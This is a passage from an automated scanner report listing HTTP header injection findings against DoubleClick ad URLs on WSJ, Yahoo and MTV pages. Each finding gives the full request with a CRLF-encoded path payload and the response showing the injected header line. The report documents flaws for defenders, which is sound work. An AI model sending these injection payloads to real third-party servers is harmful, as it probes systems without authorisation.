GET /f1e1b%0d%0a757e311c10f;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/f1e1b
757e311c10f
;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.wsj.com/B3951656

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 20668%0d%0ab389d2ddde4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /20668%0d%0ab389d2ddde4/N3282.wsj.com/B3951656;sz=1x1;p=%9BKHUWN%A2;ord=3132099? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=2;tile=4;sz=170x67;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/20668
b389d2ddde4
/N3282.wsj.com/B3951656;sz=1x1;p=.KHUWN.;ord=3132099:
Date: Tue, 14 Jun 2011 00:15:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 903fb%0d%0a38f723404aa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /903fb%0d%0a38f723404aa/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*;ord=0.04136643558740616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/903fb
38f723404aa
/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http: //global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gR
Date: Mon, 13 Jun 2011 14:13:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 778c8%0d%0a56e4198e1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /778c8%0d%0a56e4198e1a/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/778c8
56e4198e1a
/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 29a4b%0d%0aece2e9b9626 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /29a4b%0d%0aece2e9b9626/interactive.wsj.com/tech_front;u=%5E%5ElA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/29a4b
ece2e9b9626
/interactive.wsj.com/tech_front;u=^^lA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2fbd2%0d%0a7f64288fd33 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2fbd2%0d%0a7f64288fd33/interactive.wsj.com/tech_main_story;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2fbd2
7f64288fd33
/interactive.wsj.com/tech_main_story;u=^^lDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 16d55%0d%0a0e95c6c688f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /16d55%0d%0a0e95c6c688f/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/16d55
0e95c6c688f
/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91475%0d%0ab926d5ec16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91475%0d%0ab926d5ec16/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=btf;tag=adi;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-btf%7Ctag-adi%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91475
b926d5ec16
/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!categ:
Date: Tue, 14 Jun 2011 00:18:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22809%0d%0ab65a54cc41a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22809%0d%0ab65a54cc41a/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22809
b65a54cc41a
/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100:
Date: Tue, 14 Jun 2011 00:17:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33fc2%0d%0a660ac79f9dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33fc2%0d%0a660ac79f9dc/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/33fc2
660ac79f9dc
/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7dd09%0d%0ae73ef701a8c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7dd09%0d%0ae73ef701a8c/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7dd09
e73ef701a8c
/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/music/_mn

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 469eb%0d%0ae53c58461e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /469eb%0d%0ae53c58461e1/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/469eb
e53c58461e1
/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=:
Date: Tue, 14 Jun 2011 00:18:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66ca2%0d%0a4341a7674c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66ca2%0d%0a4341a7674c7/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66ca2
4341a7674c7
/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/_hp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 25871%0d%0ae35eac74214 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /25871%0d%0ae35eac74214/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-728x90%7Ctile-3;ord=892685005487874200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/25871
e35eac74214
/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp|!category-float|!category-pop|!category-video|!category-expand|!category-pointroll|pos-bt:
Date: Tue, 14 Jun 2011 00:17:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/music/_mn

Issue detail

